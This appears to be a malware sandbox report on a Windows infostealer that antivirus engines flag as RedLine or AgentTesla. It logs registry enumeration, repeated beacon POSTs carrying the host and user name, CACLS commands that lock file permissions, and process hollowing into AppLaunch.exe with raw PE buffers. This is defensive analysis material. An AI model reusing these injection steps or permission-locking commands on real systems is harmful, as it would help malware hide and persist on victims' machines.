
RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000468
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0
process AppLaunch.exe useragent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
process explothe.exe useragent
process iexplore.exe useragent Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Process injection Process 2820 called NtSetContextThread to modify thread in remote process 2908
Process injection Process 2516 called NtSetContextThread to modify thread in remote process 2680
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 3996568
registers.edi: 0
registers.eax: 4198977
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000114
process_identifier: 2908
1 0 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 3013372
registers.edi: 0
registers.eax: 4384798
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000114
process_identifier: 2680
1 0 0
Time & API Arguments Status Return Repeated

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.89&sd=04d170&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0
Process injection Process 2820 resumed a thread in remote process 2908
Process injection Process 2516 resumed a thread in remote process 2680
Process injection Process 232 resumed a thread in remote process 776
Process injection Process 1356 resumed a thread in remote process 2708
Process injection Process 1356 resumed a thread in remote process 2276
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000114
suspend_count: 1
process_identifier: 2908
1 0 0

NtResumeThread

 thread_handle: 0x00000114
suspend_count: 1
process_identifier: 2680
1 0 0

NtResumeThread

 thread_handle: 0x00000264
suspend_count: 1
process_identifier: 776
1 0 0

NtResumeThread

 thread_handle: 0x00000388
suspend_count: 1
process_identifier: 2708
1 0 0

NtResumeThread

 thread_handle: 0x0000057c
suspend_count: 1
process_identifier: 2276
1 0 0
cmdline cmd /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
cmdline CACLS "..\fefffe8cea" /P "test22:R" /E
cmdline CACLS "explothe.exe" /P "test22:N"
cmdline CACLS "..\fefffe8cea" /P "test22:N"
cmdline CACLS "explothe.exe" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "test22:N"&&CACLS "explothe.exe" /P "test22:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "test22:N"&&CACLS "..\fefffe8cea" /P "test22:R" /E&&Exit
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2604
thread_handle: 0x0000001c
process_identifier: 2600
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\sw8Ll4hQ.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

 thread_identifier: 452
thread_handle: 0x00000124
process_identifier: 232
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\6li43XC.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

 thread_identifier: 2672
thread_handle: 0x0000001c
process_identifier: 2668
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\CL7mg6kK.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

 thread_identifier: 2744
thread_handle: 0x00000124
process_identifier: 2740
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\5QZ57Cm.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

 thread_identifier: 2728
thread_handle: 0x0000001c
process_identifier: 2724
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\Xf6FM0Om.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

 thread_identifier: 2508
thread_handle: 0x00000124
process_identifier: 2516
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\4xZ332Qr.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

 thread_identifier: 2780
thread_handle: 0x0000001c
process_identifier: 2776
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\xu7aE2xu.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

 thread_identifier: 2264
thread_handle: 0x00000124
process_identifier: 2260
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\3Fy8If55.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

 thread_identifier: 2824
thread_handle: 0x0000001c
process_identifier: 2820
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP004.TMP\1Xf30uE8.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

 thread_identifier: 2972
thread_handle: 0x00000124
process_identifier: 2968
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP004.TMP\2LJ507bv.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

 thread_identifier: 2912
thread_handle: 0x00000114
process_identifier: 2908
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000118
1 1 0

NtGetContextThread

 thread_handle: 0x00000114
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2908
region_size: 204800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000118
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $àž ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhX‚ÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°€dX´ÿmY°€’Y¥ÿmY°€oX¥ÿmYRich¤ÿmYPELÖT5eà $*¸A@@ @L›(ààðÐ/à @@.text)* `.rdataxa@b.@@.datah#°@À.rsrcààž@@.relocÐ/ð0 @B
base_address: 0x00400000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00424000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ “ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þˆZB@¶B@¶B@¶B@¶B@¶BH¶B]Bˆ^BÈTB€µB`°BC˜¶BHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇBHÇBœ¶BLÇBLÇBLÇBLÇBLÇBLÇBLÇB..þÿÿÿ   þÿÿÿu˜ŠÐù¾cyåú¦eÍiL’Ś?þDVƒÐü!ŠÊû‰×6}¼™$Áªaк;ëZèy©Ä*@éã¶úæô€;Ž;¥¹Ò3[ 1œà©Üށ—Ù#,s—s3WILȽy+  qPøkú¢¼ÇmµúÂÆâs5†}àO£td€ïˆôfGj}Ɂ¬:ø÷¹â&÷c&ÀǙ@z‘ÞcÅgÓÑëGïNn3g“ ‰|ÔZز¤G> bŠ&}LºF‰w‹XÍ|[x¦D@q#4m$>äÂö>/ö8Iå¸7МGñD¨íòDñ¥Ñ&\qÀÒJ²Z $\ÒVi×´v8·´ˆÆ &À‡ÿ>̐<[ÏlEfMdý|îoK¡JnÜnÔϯ ïµÃFòÜxAayÛO†w(ì³Ö-ÆÆõA5«V¥0½REA“ãýñbG-¨¦¥ [Êþdã0[okû€hn¤ÛB ±±!S^¥4\Áéj8ªJÛ®!2ɘ€)C…¨”ñgÕ{@ÜMZ¶ß?…þŒ÷‘}M¯­„,ëï—õ*ž Û³OS*÷=B˜9Àc\#ŒÃ\9§ 0b;–(Ïÿ©(ÎZ﨏™ðšóe^4>ØxšúI"WÂB°%/힯¼áy?Ó( —ÖüM݋ð·7¢ —–…L{éü=ž·Ë¡gǃmPvl|S╏ DÄêq¯”o“ùŽ¾„Ì •!sœì©M7<wòÂ,-•–€<L1Ò ¿ü†/’˜w̓ð¹DPÐò°=þoʟÐðҌ¶eÆzoaªd>aùr)0Þ sÉzdÎD8@¸Þ¿åK@X›¥³jj&å™"Šª¯L¤E©ÊæpÏ_éKr¢•O‰Ý›TmªƒÛªuZE)J2^D{ðR¤%•£‚§õ…¼wX…˜"Æ®ë"~"ê<äPu¶ç˜„5G‚}¹‰~ó³œPr<LÌu ítuuDæ…Ôúä„fÂî4Ñ@#j-ÂÒ£ ÑɺgÍZê·í2>[Ììg€u‚„½C*PHçëhºö-€áN($q$ãeË°þm*â˜k3²Jd‰¼I?Ó#J€0ÊD’êQâZb&'ԋ ¦g¡Æ^_/|ŽB.?AVbad_exception@std@@|ŽB.?AVexception@std@@|ŽB.?AVtype_info@@
base_address: 0x0042b000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer: €0€ H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0042e000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0042f000
process_identifier: 2908
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 2908
process_handle: 0x00000118
1 1 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 3996568
registers.edi: 0
registers.eax: 4198977
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000114
process_identifier: 2908
1 0 0

NtResumeThread

 thread_handle: 0x00000114
suspend_count: 1
process_identifier: 2908
1 0 0

NtResumeThread

 thread_handle: 0x00000184
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x000001f8
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x00000238
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x00000278
suspend_count: 1
process_identifier: 2968
1 0 0

NtGetContextThread

 thread_handle: 0x00000188
1 0 0

NtGetContextThread

 thread_handle: 0x00000188
1 0 0

NtResumeThread

 thread_handle: 0x00000188
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x00000368
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x000003a0
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x00000430
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x00000454
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x0000046c
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x00000488
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x000004a0
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x000004b8
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x000004d0
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x000004e8
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x00000504
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x00000510
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x00000568
suspend_count: 1
process_identifier: 2968
1 0 0

NtResumeThread

 thread_handle: 0x000005ec
suspend_count: 1
process_identifier: 2968
1 0 0

CreateProcessInternalW

 thread_identifier: 2700
thread_handle: 0x00000114
process_identifier: 2680
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000118
1 1 0

NtGetContextThread

 thread_handle: 0x00000114
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 253952
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000118
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELïd‚Æà 0ʬè @ à@…ÈçSV©À  H.text$È Ê `.rsrcV©ªÌ@@.reloc Àv@B
base_address: 0x00400000
process_identifier: 2680
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00402000
process_identifier: 2680
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00430000
process_identifier: 2680
process_handle: 0x00000118
1 1 0

WriteProcessMemory

 buffer: à 8
base_address: 0x0043c000
process_identifier: 2680
process_handle: 0x00000118
1 1 0
Bkav W32.AIDetectMalware
Cynet Malicious (score: 100)
CAT-QuickHeal Trojan.GenericRI.S31067593
Skyhigh BehavesLike.Win32.AgentTesla.tc
McAfee Trojan-FVTT!1E399FD52E22
VIPRE IL:Trojan.MSILMamut.12798
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 0051918e1 )
K7GW Trojan ( 0051918e1 )
Cybereason malicious.c01062
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 multiple detections
APEX Malicious
ClamAV Win.Packed.Disabler-10009777-0
Kaspersky HEUR:Trojan.Win32.Injuke.gen
NANO-Antivirus Trojan.Win32.Deyma.kbnced
SUPERAntiSpyware Trojan.Agent/Gen-Downloader
MicroWorld-eScan IL:Trojan.MSILMamut.12798
Avast Win32:Evo-gen [Trj]
Rising Trojan.Generic@AI.100 (RDML:otSXu4PIY2MTANgPLQ7YdQ)
F-Secure Trojan.TR/Spy.Gen
DrWeb Trojan.PWS.RedLineNET.9
TrendMicro TrojanSpy.Win32.REDLINE.YXDJWZ
Trapmine malicious.high.ml.score
Sophos Generic ML PUA (PUA)
SentinelOne Static AI - Malicious SFX
GData Win32.Trojan.PSE.1N3O6MD
Jiangmin TrojanDownloader.Deyma.arg
Varist W32/Kryptik.JKR.gen!Eldorado
Avira TR/Kryptik.ofzuw
Antiy-AVL Trojan/Win32.Tiggre
Gridinsoft Spy.Win32.Redline.lu!heur
ZoneAlarm HEUR:Trojan.Win32.Injuke.gen
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
ALYac Trojan.GenericKD.69761066
Malwarebytes Generic.Malware.AI.DDS
Zoner Trojan.Win32.162634
TrendMicro-HouseCall TROJ_GEN.R002H0CJN23
Tencent Trojan.Win32.GenKryptik.kp
Yandex Trojan.DL.Agent_AGen!wW6Q+u2H4PU
Ikarus Trojan.Spy.Stealer
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Kryptik.HUKQ!tr
AVG Win32:Evo-gen [Trj]